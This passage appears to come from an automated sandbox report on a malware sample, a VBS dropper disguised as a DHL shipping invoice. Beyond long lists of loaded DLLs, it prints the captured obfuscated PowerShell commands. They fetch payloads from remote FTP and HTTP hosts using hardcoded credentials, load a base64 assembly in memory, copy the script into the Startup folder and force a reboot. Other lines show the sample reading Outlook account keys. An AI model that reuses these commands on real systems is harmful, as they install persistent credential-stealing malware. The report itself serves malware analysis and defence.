                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: Binary string: F:\Source Coder Vb.net C#\crc crypter\Source code UpCry\Metodo DF\ClassLibrary3\ClassLibrary3\obj\Release\ClassLibrary3.pdb source: powershell.exe, 00000004.00000002.2802743129.0000012FDD430000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' +", "0", "false");
                      Source: 13.2.powershell.exe.1c40e52f4b8.1.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                      Source: 13.2.powershell.exe.1c40e200000.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                      Source: 18.2.powershell.exe.286bf97d858.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                      Source: 27.2.powershell.exe.1c71844dd88.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAF
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + 